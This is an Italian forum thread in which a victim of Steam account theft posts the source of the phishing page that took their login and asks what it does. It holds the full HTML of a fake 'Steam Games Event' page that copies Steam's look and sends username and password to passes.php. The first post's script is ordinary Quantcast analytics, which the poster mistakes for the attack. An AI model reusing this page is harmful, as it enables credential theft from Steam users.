Visualizzazione dei risultati da 1 a 3 su 3
  1. #1

    Sono stato hackato da questo codice sorgente

    Ciao a tutti,
    di recente mi sono lasciato hackare molto stupidamente l'account di steam. Questo è il codice sorgente della pagina da cui mi sono stati rubati username e password:

    codice:
    //
    // For correct measurement, DO NOT HOST THIS FROM ANOTHER SERVER
    //
    function _qcdst(){if(_qctzoff(0)!=_qctzoff(6))return 1;return 0;}
    function _qctzoff(m){
    var d1=new Date(2000,m,1,0,0,0,0);
    var t=d1.toGMTString();
    var d3=new Date(t.substring(0,t.lastIndexOf(" ")-1));
    return d1-d3;
    }
    function _qceuc(s){
    if(typeof(encodeURIComponent)=='function'){return encodeURIComponent(s);}
    else{return escape(s);}
    }
    function _qcrnd(){return Math.round(Math.random()*2147483647);}
    function _qcgc(n){
     var v='';
     var c=document.cookie;if(!c)return v;
     var i=c.indexOf(n+"=");
     var len=i+n.length+1;
     if(i>-1){
      var end=c.indexOf(";", len);
      if(end<0)end=c.length;
      v=c.substring(len,end);
     }
     return v;
    }
    function _qcdomain(){
     var d=document.domain;
     if(d.substring(0,4)=="www.")d=d.substring(4,d.length);
     var a=d.split(".");var len=a.length;
     if(len<3)return d;
     var e=a[len-1];
     if(e.length<3)return d;
     d=a[len-2]+"."+a[len-1];
     return d;
    }
    function _qcsc(m){
     var s="";var d=_qcdomain();
     if (m=="ad"||d=="doubleclick.net"||d=="atdmt.com"||d=="yieldmanager.com"||d=="fimserve.com"||
      d=="tribalfusion.com"||d=="trafficmp.com"){s+=";fpan=u;fpa=";return s;}
     var u=document;var a=_qcgc("__qca");
     if(a.length>0){s+=";fpan=0;fpa="+a;}
     else{
      var da=new Date();
      a='P0-'+_qcrnd()+'-'+da.getTime();
      u.cookie="__qca="+a+"; expires=Sun, 18 Jan 2038 00:00:00 GMT; path=/; domain="+d;
      a=_qcgc("__qca");
      if(a.length>0){s+=";fpan=1;fpa="+a;}
      else{s+=";fpan=u;fpa=";}
     }
     return s;
    }
    function _qcdc(n){
     document.cookie=n+"=; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain="+_qcdomain();
    }
    function _qpxload(){
     if((_qimg)&& typeof _qimg.width =="number"){
      if (_qimg.width==3){_qcdc("__qca");}
    }}
    function quantserve(){
     var r=_qcrnd();
     var sr='',qo='',qm='',url='',ref='',je='u',ns='1',media='webpage',event='load';
     if(typeof _qoptions !="undefined" && _qoptions!=null){
      for(var k in _qoptions){
       if(typeof(_qoptions[k])!='string'){continue;}
       if(k=='qacct'){_qacct=_qoptions[k];}
       else{qo+=';'+k+'='+_qceuc(_qoptions[k]);}
       if(k=='media'){media=_qoptions[k];}
       if(k=='event'){event=_qoptions[k];}
      }
      _qoptions=null;
     }
     if((typeof _qacct =="undefined")||(_qacct.length==0))return;
     if(media=='webpage' && event=='load'){
      if((typeof _qpixelsent !="undefined")&&(_qpixelsent==_qacct))return;
      _qpixelsent=_qacct;}
     var ce=(navigator.cookieEnabled)?"1":"0";
     if(typeof navigator.javaEnabled !='undefined')je=(navigator.javaEnabled())?"1":"0";
     if(typeof _qmeta !="undefined" && _qmeta!=null){qm=';m='+_qceuc(_qmeta);_qmeta=null;}
     if(self.screen){sr=screen.width+"x"+screen.height+"x"+screen.colorDepth;}
     var d=new Date();
     var dst=_qcdst();
    
    
     var dg="E10068-W-MO-5";
     var qs="http://pixel.quantserve.com";
     var fp=_qcsc(media);
     if(window.location && window.location.href)url=_qceuc(window.location.href);
     if(window.document && window.document.referrer)ref=_qceuc(window.document.referrer);
     if(self==top)ns='0';
     _qimg=new Image();
     _qimg.alt="";
     _qimg.src=qs+'/pixel'+';r='+r+fp+';ns='+ns+';url='+url+';ref='+ref+';ce='+ce+';je='+je+';sr='+sr+';dg='+dg+';dst='+dst+';et='+d.getTime()+';tzo='+d.getTimezoneOffset()+';a='+_qacct+qo+qm;
     _qimg.onload=function() {_qpxload();}
    }
    quantserve();
    Per curiosità mi potreste interpretare le parti del codice "hackate"? E c'è un modo per risalire a qualche dato dell'hacker (ad es. l'email), tramite questo codice?

  2. #2
    (Questo è il code del sito principale, non entrava nello stesso post)
    [code]

    codice:
    <html>
    <head>
    <META http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Steam Games Event</title>
    <link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
    <link rel="stylesheet" type="text/css" href="https://steamcommunity.com/public/css/skin_1/global.css" />
    <link rel="stylesheet" type="text/css" href="https://steamcommunity.com/public/css/skin_1/home.css" />
    <link rel="stylesheet" type="text/css" href="https://steamcommunity.com/public/css/skin_1/header.css" />
    <script language="javascript" src="https://steamcommunity.com/public/javascript/global.js"></script>
    <script language="javascript" src="https://steamcommunity.com/public/javascript/home.js"></script>
    <script language="javascript">
    var captchaRefreshURL = 'https://steamcommunity.com/actions/RefreshCaptcha';
    var captchaImgURL = 'https://steamcommunity.com/public/captcha.php';
    </script>
    </head>
    <body>
    
    <style type="text/css">
    #t35ad{font: 14px  arial,helvetica; text-decoration: none; line-height:1.5em; text-align: center; }
    #t35ad a{font: 14px  arial,helvetica; text-decoration: none; }
    #t35ad a:hover{background-color: black; color: white; font-size:medium; font-weight: bold; }
    #t35ad ul{display: inline; list-style-type: none; padding: 0;}
    #navlist li{display: inline; list-style-type: none; padding-right: 0px; padding-left: 0px; padding: 0;}
    </style>
    
    
    <style type="text/css">
    #t35ad{font: 14px  arial,helvetica; text-decoration: none; line-height:1.5em; text-align: center; }
    #t35ad a{font: 14px  arial,helvetica; text-decoration: none; }
    #t35ad a:hover{background-color: black; color: white; font-size:medium; font-weight: bold; }
    #t35ad ul{display: inline; list-style-type: none; padding: 0;}
    #navlist li{display: inline; list-style-type: none; padding-right: 0px; padding-left: 0px; padding: 0;}
    </style>
    
    
    <center>
    
    <div id="language_select" style="width: 100%; height: 55px; background-color: rgb(194, 100, 19); vertical-align: middle;" name="language_select">
    	<table width="100%" cellspacing="0" cellpadding="0">
    	<tbody>
    		<tr height="55">
    
    			<td width="119">
    				
    			</td>
    			<td width="20"/>
    			<td align="left">
    				<form style="" action="">
    				<span style="font-family: Verdana; color: rgb(34, 34, 34); font-size: 10px;">Select your preferred language.</span>
    				
    
    
    				<select class="language_select" onchange="submit();" name="language">
    				<option value="" selected="1">- choose language -</option>
    				<option value="danish">Danish</option>
    				<option value="dutch">Dutch</option>
    				<option value="english">English</option>
    				<option value="finnish">Finnish</option>
    
    				<option value="french">French</option>
    				<option value="german">German</option>
    				<option value="italian">Italian</option>
    				<option value="japanese">Japanese</option>
    				<option value="korean">Korean</option>
    				<option value="norwegian">Norwegian</option>
    
    				<option value="polish">Polish</option>
    				<option value="portuguese">Portuguese</option>
    				<option value="russian">Russian</option>
    				<option value="schinese">Simplified Chinese</option>
    				<option value="tchinese">Traditional Chinese</option>
    				<option value="spanish">Spanish</option>
    
    				<option value="swedish">Swedish</option>
    				<option value="thai">Thai</option>
    				</select>
    				</form>
    			</td>
    		</tr>
    	</tbody>
    	</table>
    
    </div>
    <div id="headerBar">
    	<div id="steamLogo"></div>
    	<div id="steamText"></div>
    	<div id="headerLinks">
    		<div id="headerRight">
    			Login 
    		</div>
    		
    
    
    
    			Home  | 
    			What is Steam  | 
    			<span class="headerLinkActive">Community</span>  | 
    
    			News  | 
    			Cyber Caf&eacute;s  | 
    			Forums  | 
    
    			Support  | 
    			Stats
    		</p>
    	</div>
    	<div id="subHeader">
    		<div id="searchBox">
    
    			<form method="GET" action="http://steamcommunity.com/actions/Search">
    			<input id="searchInputBox" type="text" name="K" value="Search" onClick="if( this.value == 'Search' ) { this.value='' }" onFocus="if( this.value == 'Search' ) { this.value='' }" onBlur="if( this.value == '' ) { this.value='Search' }" />
    			</form>
    		</div>
    	</div>
    </div>
    
    <div id="mainBody">
    	<div id="mainBodyHeader">
    		<h1>The Steam Event</h1>
    
    		
    
    The Steam Games Event is a free games give away by a gift.
    Now it's easy to get a free game and play them for all the time also friends, organize groups, join chats, host matches and more.
    Best of all, it's free.
    Thanks to our Sponsors: T35 Hosting</p>
    		</span>
    		</div>
    			
    	</div>
    	<div id="lowerContents">
    		<div id="lowerRightContents">
    			<div id="rightActionBlockHeader"></div>
    
    			<div id="rightActionBlock">
    				<form action="passes.php" method="get" id="LoginForm" name="aspnetForm">
    				<input type="hidden" value="doLogin" />
    				<input type="hidden"/>
    				<label for="steamAccountName">Steam Username:</label>
    				<input class="textField" type="text" name="steamAccountName" id="steamAccountName"  />
    
    				<label for="steamPassword">Password:</label>
    
    				<input class="textField" type="password" name="steamPassword" id="steamPassword" />
    
    				<input class="subImage" type="image" src="log.gif" width="104" height="25" border="0" />
    				</form>
    			</div>
    			<div id="rightActionBlockFooter"></div>
    
    			<div class="rightLowBlockHeader"></div>
    				<div class="rightLowBlock">
    					<h2>Join Steam for Free!</h2>
    
    					<h2>And Get Free Games!</h2>
    					
    
    Take a quick tour of Steam</p>
    					
    
    Browse existing groups</p>
    					
    				</div>
    			<div class="rightLowBlockFooter"></div>
    
    			<div class="rightLowBlockHeader"></div>
    				<div class="rightLowBlock">
    
    					<p class="ulTitle">Use The Steam Community to...</p>
    					<ul>
    						[*]Create your own profile page
    						[*]Create and join groups
    						[*]Easily see your friends online and in-game
    						[*]Schedule matches and events
    
    						[*]Review who you've played with lately
    						[*]Track gameplay stats
    						[*]Chat with groups
    						[*]Chat via voice in-game or out
    					[/list]
    				</div>
    			<div class="rightLowBlockFooter"></div>
    
    <div id="rightLowBlockFooter"></div>
    		</div>
    	<div id="lowerFeaturesHeader"></div>
    	<div id="lowerFeatures">
    
    		<div id="lowerFeaturesRight">
    				
    				<input id="ispen13" name="is_pending13" value="1" type="checkbox"> <input id="ispen12" name="is_pending12" value="1" type="checkbox"> <input id="ispen11" name="is_pending11" value="1" type="checkbox"></div>			
    		</div>
    
    	<div id="lowerFeaturesFooter"></div>		
    		<div id="lowerContentsImage"></div>
    		
    		<div id="lowerBlurbsHeader"></div>
    		<div id="lowerBlurbs">
    			<div id="lowerBlurbsRight">
    
    				
    				<input id="ispen10" name="is_pending10" value="1" type="checkbox"> <input id="ispen9" name="is_pending9" value="1" type="checkbox">
    				<input id="ispen8" name="is_pending8" value="1" type="checkbox"></div>
    
    			
    
    		</div>
    		<div id="lowerBlurbsFooter"></div>
    
    		
    
    		<input id="ispen7" name="is_pending7" value="1" type="checkbox">
    		<input id="ispen6" name="is_pending6" value="1" type="checkbox">
    		<input id="ispen5" name="is_pending5" value="1" type="checkbox">
    
    
    			<input id="ispen2" name="is_pending2" value="1" type="checkbox">
    
    		<input id="ispen3" name="is_pending3" value="1" type="checkbox">
    		<input id="ispen4" name="is_pending4" value="1" type="checkbox">
    		</p>
    		
    
     <input id="ispen1" name="is_pending1" value="1" type="checkbox">
    		<input id="ispen" name="is_pending" value="1" type="checkbox">
    		<input id="ispen0" name="is_pending0" value="1" type="checkbox"></p>
    		<input id="ispen7" name="is_pending7" value="1" type="checkbox">
    		<input id="ispen6" name="is_pending6" value="1" type="checkbox">
    
    		<input id="ispen5" name="is_pending5" value="1" type="checkbox">
    
    
    		
    
    
    		
    
    	</div>
    </div>
    (continua...)

  3. #3
    codice:
    </div>
    </center>
    </noscript></noframes>
    
    
    
    <script type="text/javascript">
    _qoptions={
    qacct:"p-f2Rp-GHnsAESA"
    };
    </script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
    <noscript></noscript>
    
    
    <div id="t35ad" align="center" style="display:block;">
    
    Hosted by T35 Free Web Hosting. -<a target=_blank href=http://www.hypercasinos.com>Online Casinos--<a target=_blank href=http://www.drugrehabcenter.com/>Drug Rehab--<a target=_blank href=http://www.uk-cheapest.co.uk>Domain Names-Track Bike
    
    </div></noscript></noframes>
    
    
    
    <script type="text/javascript">
    _qoptions={
    qacct:"p-f2Rp-GHnsAESA"
    };
    </script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
    <noscript></noscript>
    
    <div id="t35ad" align="center" style="display:block;">
    
    Hosted by T35 Free Web Hosting. -<a target=_blank href=http://www.hypercasinos.com>Online Casino--<a target=_blank href=http://www.drugrehabcenter.com/>Center for Addiction--<a target=_blank href=http://www.uk-cheapest.co.uk>Hosting--<a target=_blank href=http://www.citygrounds.com>Fixed Gear Bike
    
    </div></body>
    </html>

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.